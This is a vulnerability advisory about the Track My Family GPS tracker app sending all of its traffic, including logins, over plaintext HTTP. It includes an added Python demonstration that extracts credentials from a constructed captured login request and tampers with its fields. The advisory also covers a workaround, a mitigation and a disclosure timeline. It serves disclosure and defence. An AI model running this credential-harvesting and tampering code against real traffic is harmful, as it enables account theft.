SIK-2017-040
Title:
Plaintext Communication in GPS Location Tracker App
Report ID
SIK-2017-040
Summary:
- Vendor: SeeBetaApp
- Product: Track My Family (Package-name: com.betaapp.myfamilylocator)
- Affected Version: 2.6
- Severity: high
- Short summary: All traffic between the app and its backend is plaintext HTTP; an on-path attacker can read and modify it, including login credentials
Details:
All communication between the app and its backend uses plain HTTP. HTTP is a cleartext protocol: it is neither encrypted nor integrity protected. A man-in-the-middle adversary (for example on the same Wi-Fi network) can eavesdrop on and modify all traffic between an app user and the backend, e.g. capturing login credentials or altering requests and responses in transit.
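The following script is an added example and not part of the original advisory or the vendor's code. It shows, on a constructed capture of a plaintext login request, the two consequences described above: an on-path attacker can pull the credentials straight out of the request, and, because HTTP provides no integrity protection, can rewrite a form field and fix up Content-Length so the backend accepts the altered request. The host, path and parameter names are assumptions for illustration, not the real app's API.

```python
"""Added example: eavesdropping on and tampering with a plaintext HTTP
login request, as an on-path attacker could do against an app that
talks HTTP instead of HTTPS. Not part of the original advisory."""
import re
from urllib.parse import parse_qsl, urlencode, urlparse

# Constructed sample request as it would appear on the wire. The host,
# path and field names are assumptions, not the real app's endpoints.
CAPTURED_LOGIN = (
    b"POST /api/login HTTP/1.1\r\n"
    b"Host: backend.example.invalid\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 38\r\n"
    b"\r\n"
    b"user=alice&password=hunter2&remember=1"
)

# Field names that typically carry credentials or session secrets.
SECRET_FIELDS = re.compile(r"user|pass|pwd|token|secret|session", re.I)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased; the body is cut to Content-Length."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    return method, path, headers, body[:length]


def find_secrets(raw):
    """Return the credential-like form fields an eavesdropper can read
    from a cleartext form POST (empty dict for other content types)."""
    _method, _path, headers, body = parse_http_request(raw)
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return {}
    fields = dict(parse_qsl(body.decode("iso-8859-1")))
    return {k: v for k, v in fields.items() if SECRET_FIELDS.search(k)}


def tamper_form_field(raw, name, value):
    """Rewrite one form field in transit and correct Content-Length.
    Nothing in plain HTTP lets the backend detect this modification."""
    _method, _path, _headers, body = parse_http_request(raw)
    fields = dict(parse_qsl(body.decode("iso-8859-1")))
    fields[name] = value
    new_body = urlencode(fields).encode()
    head, _, _ = raw.partition(b"\r\n\r\n")
    new_head = re.sub(rb"(?im)^content-length:[^\r\n]*",
                      b"Content-Length: %d" % len(new_body), head)
    return new_head + b"\r\n\r\n" + new_body


def is_cleartext_url(url):
    """True for endpoints that would be reached over plain HTTP."""
    return urlparse(url).scheme.lower() == "http"


if __name__ == "__main__":
    print("credentials visible on the wire:", find_secrets(CAPTURED_LOGIN))
    altered = tamper_form_field(CAPTURED_LOGIN, "remember", "0")
    print("altered request body:", parse_http_request(altered)[3])
    for url in ("http://backend.example.invalid/api/login",
                "https://backend.example.invalid/api/login"):
        print(url, "-> cleartext" if is_cleartext_url(url) else "-> encrypted")
```

The same parsing applied to a real capture (for instance from a Wi-Fi access point the attacker controls) recovers the credentials of every user whose app logs in through it; with HTTPS the attacker sees only TLS records, and any modification breaks the record MAC.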
Workaround
Use a VPN connection when using this app. Note that this only protects the path between the device and the VPN endpoint; between the VPN exit and the backend the traffic is still plaintext.
Suggested Mitigation
Use HTTPS for all communication between the app and the backend, with proper server certificate validation. On Android, cleartext traffic can additionally be blocked app-wide via the network security configuration (cleartextTrafficPermitted="false").
Timeline
- 2017-08-09 Vulnerability Discovered
- 2017-08-10 Contacted developer
- 2018-08-11 Published